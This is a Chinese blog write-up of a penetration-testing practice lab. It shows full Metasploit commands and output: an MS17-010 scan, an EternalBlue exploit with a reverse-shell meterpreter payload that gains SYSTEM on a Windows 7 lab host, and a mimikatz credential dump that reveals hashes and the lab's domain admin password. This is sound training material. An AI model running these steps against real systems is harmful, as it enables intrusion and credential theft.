cfs 红日靶场（一）用wsl的msf 重新渗透笔记

上次由于网络问题没复现的现在再搞一遍
ms17_010:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.1.5
rhost => 192.168.1.5
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.5:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.5:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

很难搞，我明白了

之前设置的是桥接，就是连接家里同个wifi的都可以互ping
但是我笔记本连的wifi和台式机的网段不一样
我一看，可恶，我台式是用的网线，那个网段是80.1
笔记本上一看是80.2

所以3种解决方法：

笔记本插网线，但是暂时没条件
vmware里面再装kali虚拟机，然后用同样的设置（桥接）
物理机（宿主机）上面装wsl，然后改vmware网络为net

本来想搞的方法2，结果阴差阳错搞了方法3

set payload windows/x64/meterpreter/reverse_tcp

set rhost 192.168.80.128

set lport 4567

exploit

下面是运行结果

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                             ki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Win
                                             dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
                                             es.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows
                                              Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 20
                                             08 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.24.105.158   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.80.128
rhost => 192.168.80.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.24.105.158
lhost => 172.24.105.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4567
lport => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 172.24.105.158:4567
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.80.128:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.80.128:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.80.128:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.24.96.1
[*] Meterpreter session 1 opened (172.24.105.158:4567 -> 172.24.96.1:53290 ) at 2022-04-23 22:35:25 +0800
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

笑死，我进来本想提权，结果发现开局直接是system
想看system提全可以去用viper

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                              NTLM                            SHA1
--------       ------  --                              ----                            ----
Administrator  GOD     edea194d76c77d87840ac10a764c73  8a963371a63944419ec1adf687bb1b  343f44056ed02360aead5618dd42e46
                       62                              e5                              14b5f70cf
STU1$          GOD                                     0ba7dcdc7f5bef947c985490b99228  e5c0f994e94ef2ac378ddb8c784bfb3
                                                       c1                              3dda7927a

wdigest credentials
===================

Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  GOD     hongrisec@2019
STU1$          GOD     df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49
                        82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2
                       c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6
                       42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88
                        1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 5
                       9 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0
                       84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e
                        74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  GOD     hongrisec@2019

kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  hongrisec@2019
stu1$          god.org  df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 4
                        9 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed
                         2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71
                        d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c
                        5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e
                         61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49
                        b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 0
                        3 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
stu1$          GOD.ORG  df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 4
                        9 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed
                         2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71
                        d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c
                        5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e
                         61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49
                        b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 0
                        3 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03

meterpreter >

发送评论 编辑评论

发送评论编辑评论